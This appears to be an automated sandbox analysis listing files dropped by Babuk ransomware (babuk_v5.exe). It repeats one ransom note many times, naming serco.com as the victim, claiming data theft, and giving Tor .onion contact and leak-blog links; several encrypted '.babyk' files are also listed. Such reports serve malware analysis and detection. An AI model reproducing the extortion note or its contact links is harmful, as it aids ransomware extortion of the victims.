                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.515281298218571
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlM8Xa1skyEvpTmEaOzmQVvRVsFcY6ZORpa406ch9jxlnIvJeuNb890T/l0UxNvt:mF/9mtEzjKFzSjxlcjNb8s+0vtn
                                                                            MD5:5D7396F8A5A9DEF194C1453921C8735D
                                                                            SHA1:0EE147276EDC173D35E606047A433258D0ED7446
                                                                            SHA-256:2E095DB317714C7ABBE07711170BCBB4EC745BC1A8FF48F76BE5350A654ADB10
                                                                            SHA-512:E837340C710FAA18193F0FC044206E64E762FACDA26C924BC0190624AD2D2BE29B4605C5F0191DD4069CF5B8A3C4C4B835008780E887ED6B32DBFB80B3417356
                                                                            Malicious:false
                                                                            Preview: .....Ai..n.L2.........w.V.6.....i......R.......k+h.J..u* <..]...r..v.....z..<........p...c.....@......S.[......S....7.... ....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.98022836073581
                                                                            Encrypted:false
                                                                            SSDEEP:192:Gq0y5rTbrHFQz3+VqNPc66s24enBHWCYKuemb/JYZiqjrB9OGhi:iy1HHSz+VqdcVs24SFXuTh5qla
                                                                            MD5:04A031C5D232E63C43322D8325155524
                                                                            SHA1:51561155C83D27FB9FB85853D89D23699FEE94E8
                                                                            SHA-256:BBD754EC72304F63A6A0CB6F489B9B6CF88BD0ABC9DAC7003A364D772DF6235D
                                                                            SHA-512:8B018B0CE25DB97D835BB26A46053118D50FD502D5B49906E3D6A97C1932BE37B63F684213502A1FC5E0CE4A30E8CF154E3FAD83E5E81C8AE7F9B49662B6AC37
                                                                            Malicious:false
                                                                            Preview: y0.P.....S....n.e..v..G..+sl,-...jv.w...Q.. ..E.3.{....._.ycS...!aY0J8.{$..@ .4.x.8%...Fif.? ..;x.B..A./_..ip..'....~.......1.%.T...Z..h.......6...I.c......p...H."N...H......^..Lg2(...i...SO....m..[...lX_'..2......C$W... ....^..WD..&.tD.\..L.Y...#P.5.............u...z.F.L..*....w.i....N..%..m..x..U..9!{&7.e<..9.'...~...".....,..!V..EsY....GS....C&.|l....%..3.m....w......}.}&;.......7/c.y....e..'...Q.`.... %E...A'...Y...}G.......Kz..loh|...n.z...^[.E..N8y...W....NF.gP8....i.k..(...!... ...j...k.D...m.@..R"%......o.x>txQ..(V.......bv.P...f..{KJ]...n...t......2.d1x.N...,..!..3.x..L...A..4..../5.o .....h(^i....X.....7=1.c...W......INb^...$..q..AH...Awg...N.9....d.n........&l;n.q..j.A..#j....f.....*..C..v9........i.......kG.$.}!.(...|....".P..._..w....7.d.b.U..T@..j.4.8U...........bO .........2_6.....0.[yS<..<.:..e.Z................O.J.A......LA&.#.....'3.Uo>.D....).._..Y....b=t1B..V............}..br........=y..^.Z.sN...8.EMV
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
